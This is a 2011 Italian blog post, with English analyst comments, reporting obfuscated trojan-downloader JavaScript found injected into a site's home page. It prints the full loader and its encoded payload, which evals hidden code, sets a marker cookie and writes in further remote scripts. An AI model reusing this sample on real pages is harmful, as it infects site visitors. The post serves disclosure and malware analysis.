Codice malevolo su un sito Web: hosting di Aruba crackato?

Recentemente, su uno dei siti che ho realizzato e che gestisco ho trovato il seguente codice JavaScript all’interno della home page (ho provato a sistemarlo in modo da renderlo più leggibile):

<scrip language="javascrip">

// Loader entry point: decodes the embedded payload string and returns the
// decoded source text, which the last statement of the script passes to eval.

// Holds the decoded payload text once $$ has run.
var kasbd3412 = "";

// Assigned without var, so $$ becomes an implicit global.
$$ = function () {

try {

// $$dfsd is an alias of asd() and gnflseejrr() returns $a,
// so this line is equivalent to: kasbd3412 = asd($a)
kasbd3412= $$dfsd(gnflseejrr());

// asd() returns the result of unescape(), i.e. a string, which has no do()
// method. This call is therefore expected to throw and divert execution to
// the catch block below.
// NOTE(review): presumably deliberate, to hide the real return path from
// simple static analysis - confirm against other samples of the same family.
kasbd3412.do();

}

catch(e) {

// bn is never read: filler statement.
var bn = "";

// The only path that returns a value: the decoded payload text.
return kasbd3412;

}

};

// Single-letter fragments spliced into property names inside asd()
// ('l'+"e"+'ngth', 'ch'+"a"+'rAt', 'unesc'+"a"+'p'+"e") so that the words
// length / charAt / unescape never appear literally in the source.
var adlan3r$oubw = "e";

// 'a'+'s'+'d' evaluates to "asd": the decoder function is looked up by a
// concatenated name and stored under an unrelated alias.
// NOTE(review): assumes `this` is the global object here (top-level code in
// a classic, non-module script).
$$dfsd =  this['a'+'s'+'d'];

var adlan3r$ouaw = "a";

// Payload decoder: walks df_ one character at a time, substitutes '%' for
// every 'Z', and returns unescape() of the rebuilt string. The payload is
// thus ordinary percent-encoding with 'Z' standing in for '%'.
//
// The function only works when called as a plain function in non-strict
// code, where `this` is the global object: it writes this['r'] / this['s1']
// and reads them back as the bare globals r, __fh and i.
function asd(df_){

// Accumulator for the rebuilt percent-encoded text (global r).
this['r']="";

var s = df_;

// 'l'+"e"+'ng'+'t'+'h' is "length"; __fh is an implicit global loop counter.
for(__fh=0;this['__fh']<s['l'+adlan3r$oubw+'ng'+'t'+'h'];__fh++ ) {

i=__fh;

// 'ch'+"a"+'rA'+'t' is "charAt".
if(s['ch'+adlan3r$ouaw +'rA'+'t'](i)=='Z') {

// neAR_DEF_FGEvftDSyTtnSoh_1 is "s1": a scratch slot for the current character.
this[neAR_DEF_FGEvftDSyTtnSoh_1]='%'}

else {

this[neAR_DEF_FGEvftDSyTtnSoh_1]=s['ch'+'ar'+'At'](this['i'])

}

// VAR_EZJrWcTGuhPYZJj(this, "s1") is an indirect read of this["s1"].
this['r']=r+VAR_EZJrWcTGuhPYZJj(this,neAR_DEF_FGEvftDSyTtnSoh_1)

}

// 'unesc'+"a"+'p'+"e" is "unescape".
return this['unesc'+adlan3r$ouaw + 'p'+adlan3r$oubw](r)

}

// Alias of window; used by the final statement to reach eval through a
// computed property name instead of a literal identifier.
var ez=window
// Property getter: returns obj[key]. Its only purpose is indirection.
VAR_AiCzwbiiMdphDXs=(function(VAR_JMFILTCeLQNWkAf,VAR_gqWQtFFAsjjtVqK){return VAR_JMFILTCeLQNWkAf[VAR_gqWQtFFAsjjtVqK];});


// Second wrapper around the same getter; asd() calls this one.
VAR_EZJrWcTGuhPYZJj=(function(VAR_wiSIHKenjOMRPsE,VAR_SfXtSSNCWJXwgQF){return VAR_AiCzwbiiMdphDXs(VAR_wiSIHKenjOMRPsE,VAR_SfXtSSNCWJXwgQF);});

// Returns the global $a (the encoded payload). $a is assigned further down
// the script, before $$ - the only caller - is invoked.
function gnflseejrr() {

return $a

}

// Evaluates to "s1": the property name asd() uses as its per-character scratch slot.
var neAR_DEF_FGEvftDSyTtnSoh_1='s'+'1';

BKbk34b32='Z63aZ3dZ22Z2566unZ2563tioZ256e Z2564csZ2528dsZ252cesZ2529Z257bdZ2573Z253dunesZ2563apeZ25Z22;ddZ3dZ2208y~tuh0:0tqi990;08}Z257F~dx0N0tqi90:0y~tuh90;0tqi9+m0fqb0iuqbSx!Z3c0iuqbSxZ2522Z3c0}Z257F~dxSxZ3c0tqiSxZ3c0~e}+~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7MZ3c0dy}uK7}Z257F~dx7MZ3c0dy}uK7iuqb7MZ3c0cxyvdY~tuh9;!Z2520Z2520+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90;0~e}9050Z2526#9050Z2522Z2526M0;0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90,,0Z252290;0~e}9050Z2522Z25M+iuqbSxZ25220-0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0#90;0~e}9050Z22;cuZ3dZ22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:wZ7by;xp;sZ7bxpyz;64c}p`|)Z25$$4|q}s|`),$*(;}rfuyq*(;p}b*Z22;cdZ3dZ22Z2574Z253dst+Z2553Z2574rinZ2567.frZ256fmCZ2568aZ2572CZ256fdZ2565(Z2528tmpZ252eZ22;deZ3dZ22!Z25209M0;0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0$90;0~e}9050!Z25209M+0}Z257F~dxSx0-0|uddubcK88dy}uK7}Z257F~dx7M0;0~e}9050Z2522Z259M0;0|uddubcK88dy}uK7}Z257F~dx7M0:0~e}9050Z2522Z259M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0Z25269050Z2522Z279M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}9050Z2522$9M+4q-4qZ3ebu`|qsu8tZ3ctqiSx0;0iuqbSxZ25220;0}Z257F~dxSx0;0iuqbSx!0;0tqiSx0;0}Z257F~dxcKdy}uK7}Z257F~dx7M0Z3d0!M0;07Z3esZ257F}79+mZ22;dcZ3dZ22rs}vybZ3esZ257F}7+fqb0}Z257F~dxc0-0~ug0Qbbqi87trc7Z3c07id~7Z3c07f}d7Z3c07f}b7Z3c07}|s7Z3c07Z257FhZ7b7Z3c07vtc7Z3c07rfv7Z3c07iec7Z3c07}s`7Z3c07~sj7Z3c07wtg79+fqb0|uddubc0-0~ug0Qbbqi87q7Z3c7r7Z3c7s7Z3c7t7Z3c7u7Z3c7v7Z3c7w7Z3c7x7Z3c7z7Z3c7y7Z3c7Z7b7Z3c7|7Z3c7}7Z3c7~7Z3c7Z257F7Z3c7`7Z3c7a7Z3c7b7Z3c7c7Z3c7d7Z3c7e7Z3c7f7Z3c7g7Z3c7h7Z3c7i7Z3c7j79+fqb0~e}rubc0-0~ug0Qbbqi8!Z3cZ2522Z3c#Z3c$Z3cZ25Z3cZ2526Z3cZ27Z3c(Z3c)9+Z2519ve~sdyZ257F~0Sq|se|qdu]qwys^e}rub8tqiZ3c0}Z257F~dxZ3c0iuqbZ3c0y~tuh9kbudeb~0888iuqb0;Z22;stZ3dZ22Z2573Z2574Z253dZ2522$aZ253dsZ2574;Z2564cZ2573(Z2564Z2561Z252bdZ2562+Z2564cZ252bdZ2564Z252bZ2564eZ252c1Z2530Z2529Z253bZ2564wZ2528Z2573tZ2529Z253bsZ2574Z253d$Z2561Z253bZ2522;Z22;czZ3dZ22Z2566uZ256eZ2563tZ2569on 
Z2563z(cZ257a)Z257breZ2574urnZ2520cZ2561+cZ2562+ccZ252bZ2563d+cZ2565+cZ257aZ253bZ257dZ253bZ22;opZ3dZ22Z2524aZ253dZ2522dZ2577(dcZ2573(cZ2575,14Z2529);Z2522;Z22;ceZ3dZ22chaZ2572CoZ2564eAtZ25280)Z255eZ2528Z25270x0Z2530Z2527+Z2565s)Z2529);}Z257dZ22;daZ3dZ22fqb0t-7vrs}vybZ3esZ257F}7+0fqb0cxyvdY~tuh0-0Z2520+vZ257Fb08fqb0y0y~0gy~tZ257FgZ3edgZ3edbu~tc9kyv08gy~tZ257FgZ3ex0.0(0660gy~tZ257FgZ3ex0,0Z2522!0660yZ3ey~tuh_v870Z2520Z27790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mu|cu0yv088gy~tZ257FgZ3ex0,0)0ll00gy~tZ257FgZ3ex0.0Z2522Z252090660yZ3ey~tuh_v870!(790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ25Z22;cbZ3dZ2228dsZ2529;sZ2574Z253dtmpZ253dZ2527Z2527;for(iZ253d0;iZ253cdZ2573Z252elZ2565nZ22;dbZ3dZ227FtuQd8!90;0!Z25200;gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mmyv08cxyvdY~tuh0--0Z252009kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMKZ2526MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0Z270;gy~tZ257FgZ3edgZ3edbu~tcKyMKZ2526MZ3eaeubiZ3e|u~wdx+m0yv08cxyvdY~tuh0.0Z25209kfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~tZ257FgZ3ewtZ3ewudEDSVe||Iuqb89+dy}uK7}Z257F~dx7M0-0gy~tZ257FgZ3ewtZ3ewudEDS]Z257F~dx89;!+dy}uK7tqi7M0-0gy~tZ257FgZ3ewtZ3ewudEDSTqdu89+fqb0t-7vZ22;dzZ3dZ22Z2566Z2575nctZ2569oZ256e dwZ2528Z2574)Z257bcaZ253dZ2527Z252564oZ2563Z252575meZ25256eZ2574.Z252577rZ252569Z2574e(Z25252Z2532Z2527Z253bZ2563Z2565Z253dZ2527Z252522Z252529Z2527;cbZ253dZ2527Z25253csZ252563riZ2525Z25370Z25257Z2534 lZ2525Z25361Z25256Z2565Z2567uaZ252567Z252565Z25253Z2564Z25255cZ252522Z256aZ252561Z2576asZ252563rZ2569Z2525Z25370Z252574Z25255Z2563Z252522Z25253eZ2527;ccZ253dZ2527Z25253cZ25255cZ25252fsZ2563ripZ2574Z2525Z2533eZ2527;windZ256fw[Z2522Z2565Z2522+Z2522Z2522+ Z2522vZ2522+Z2522alZ2522](uneZ2573Z2563aZ2570Z2565(tZ2529)};Z22;ccZ3dZ22Z2567Z2574h;Z2569++Z2529Z257btZ256dpZ253dds.sZ256cicZ2565(iZ252ci+1Z2529;Z2573Z22;Z69f 
(Z64Z6fcuZ6denZ74.Z63Z6foZ6bieZ2eindZ65xOfZ28Z27rZ66Z35f6Z64Z73Z27)Z3dZ3d-1Z29Z7bfZ75ncZ74ionZ20cZ61lZ6cZ62aZ63kZ28Z78)Z7bwinZ64Z6fw.tZ77Z20Z3d Z78;Z76Z61r dZ20Z3d new DZ61tZ65()Z3bdZ2esetZ54imeZ28Z78[Z22aZ73Z5foZ66Z22]*1Z3000Z29;vaZ72 hZ20Z3d d.Z67Z65tUZ54CHZ6fursZ28)Z3bwiZ6eZ64ow.Z68 Z3d hZ3bZ69Z66 Z28h Z3e Z38)Z7bd.Z73Z65tUTZ43DZ61tZ65Z28Z64.geZ74UTZ43Z44atZ65Z28) Z2dZ202Z29Z3b}elZ73Z65Z7bd.sZ65tUTZ43DaZ74eZ28Z64.Z67etUZ54CDZ61te(Z29 -Z203Z29Z3b}wZ69nZ64owZ2egdZ20Z3dZ20d;vZ61Z72 Z74iZ6de Z3d neZ77 ArZ72Z61y(Z29Z3bZ76Z61r Z73hZ69ftIZ6edZ65x Z3d Z22Z22;timeZ5bZ22yearZ22] Z3d d.gZ65tUZ54CFuZ6clZ59eZ61r()Z3btiZ6deZ5bZ22moZ6etZ68Z22] Z3d d.Z67Z65tZ55TZ43Z4donZ74Z68Z28Z29+Z31Z3btiZ6deZ5bZ22dayZ22] Z3d Z64.Z67etZ55TCZ44ateZ28);Z69f Z28d.gZ65Z74Z55TZ43MonZ74hZ28)+Z31 Z3c 1Z30Z29Z7bshiZ66tInZ64Z65Z78 Z3d tiZ6de[Z22Z79earZ22] +Z20Z22-0Z22 + (Z64.geZ74UZ54CMZ6fnthZ28Z29+Z31);}Z65Z6cseZ7bshZ69Z66tInZ64ex Z3d tZ69mZ65Z5bZ22Z79earZ22Z5d Z2bZ20Z22-Z22 + (dZ2eZ67etZ55TCZ4donZ74h()Z2b1);Z7difZ20Z28d.Z67etUZ54CDaZ74e()Z20Z3cZ20Z310)Z7bsZ68ifZ74InZ64ex Z3dshiZ66tZ49nZ64Z65Z78Z20+Z20Z22-Z30Z22 +Z20dZ2egeZ74UZ54Z43DatZ65();Z7deZ6cseZ7bshiZ66Z74InZ64ex Z3d sZ68ifZ74IZ6eZ64exZ20+Z20Z22-Z22 + dZ2egetZ55TCZ44ateZ28)Z3b}Z64Z6fcumZ65nt.Z77Z72iZ74e(Z22Z3csZ63rZ22+Z22ipt Z6cZ61Z6eZ67Z75Z61Z67eZ3djavaZ73crZ69ptZ22+Z22 sZ72cZ3dZ27htZ74pZ3aZ2fZ2fsearch.tZ77ittZ65rZ2ecomZ2fZ74reZ6edZ73Z2fdailZ79.jsZ6fZ6eZ3fdaZ74Z65Z3dZ22+ Z73Z68Z69fZ74InZ64ex+Z22Z26cZ61llZ62aZ63Z6bZ3dcalZ6cbacZ6b2Z27Z3eZ22 +Z20Z22Z3cZ2fscrZ22 + Z22iptZ3eZ22);Z7d Z66Z75Z6ectiZ6fn cZ61Z6clbaZ63Z6b2Z28x)Z7bZ77inZ64oZ77.tZ77 Z3dZ20x;Z73c(Z27Z72f5fZ36dsZ27,2,7Z29Z3beZ76aZ6c(unZ65sZ63aZ70e(dZ7aZ2bczZ2bZ6fp+Z73t)Z2bZ27dw(Z64zZ2bcZ7a($Z61Z2bZ73t))Z3bZ27);docZ75menZ74.Z77rZ69te(Z24Z61);}Z64ocuZ6denZ74.wZ72itZ65(Z22Z3cimg srZ63Z3dZ27httZ70:Z2fZ2fsearZ63hZ2etwiZ74Z74Z65r.cZ6fmZ2fimaZ67esZ2fseaZ72chZ2frsZ73.pZ6egZ27 wZ69dtZ68Z3d1 heZ69gZ68tZ3d1 Z73tyZ6ceZ3dZ27visiZ62Z69liZ74y:Z68iddZ65nZ27 Z2fZ3e Z3cscrZ22+Z22ipt 
Z6caZ6eguZ61geZ3djavaZ73crZ69ptZ22+Z22 sZ72cZ3dZ27httZ70:Z2fZ2fsearZ63Z68.Z74wiZ74Z74erZ2ecZ6fmZ2ftrZ65nZ64Z73Z2fdailZ79Z2ejZ73on?Z63aZ6clbZ61cZ6bZ3dcalZ6cbZ61cZ6bZ27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iptZ3eZ22);}elseZ7b$Z61Z3dZ27Z27};function Z73c(cZ6em,vZ2cedZ29Z7bvarZ20eZ78dZ3dnewZ20DZ61Z74eZ28);eZ78Z64.seZ74DatZ65(Z65xdZ2egetZ44atZ65()+Z65dZ29Z3bdoZ63umZ65nZ74Z2ecZ6fokZ69Z65Z3dZ63nZ6d+ Z27Z3dZ27 +escapZ65(vZ29+Z27;exZ70iZ72esZ3dZ27+exd.toZ47MZ54StZ72iZ6eg()Z3b};';

// BKbk34b32 is the encoded payload literal defined just above. As printed on
// this page the single-quoted literal is broken across several lines, which
// is not valid JavaScript - probably an artifact of the page formatting.
//
// First pass: every "98" in the payload becomes "Z". asd() then turns each
// 'Z' into '%' and unescapes the result.
// NOTE(review): whether the payload contains any "98" sequence was not checked.
var $a = BKbk34b32.replace(/98/g, "Z");

// String.fromCharCode(101,118,97)+'l' is "eval" and ez is window, so this is
// window.eval(<decoded payload>): the decoded text runs in the visitor's page.
//
// Decoding the plain Z-hex escapes in the payload by hand shows that the
// second stage:
//   - proceeds only if document.cookie lacks the marker 'rf5f6ds', and sets
//     that cookie through a helper named sc();
//   - loads http://search.twitter.com/trends/daily.json as a script with
//     callback / callback2 handlers;
//   - calls eval(unescape(...)) and document.write() on further encoded layers.
// The cookie name and the trends request are usable as detection indicators.
// The inner layers (variables dd, de, dc, da, db, ...) use additional
// encodings and were not decoded for these notes.
ez[String.fromCharCode(101,118,97)+'l']($$())

</scrip>

Si tratta sicuramente di un trojan che, mediante codice lato client, prova a infettare il PC dell’ignaro visitatore. In particolare, l’antivirus segnala il codice come malevolo con la seguente firma: JS/trojandownloader.twetti.nac

Nei prossimi giorni procederò con l’analisi e il deoffuscamento del codice: stay tuned.

Codice malevolo su un sito Web: hosting di Aruba crackato? – ultima modifica: 2011-01-20T11:43:21+01:00, da nazarenolatella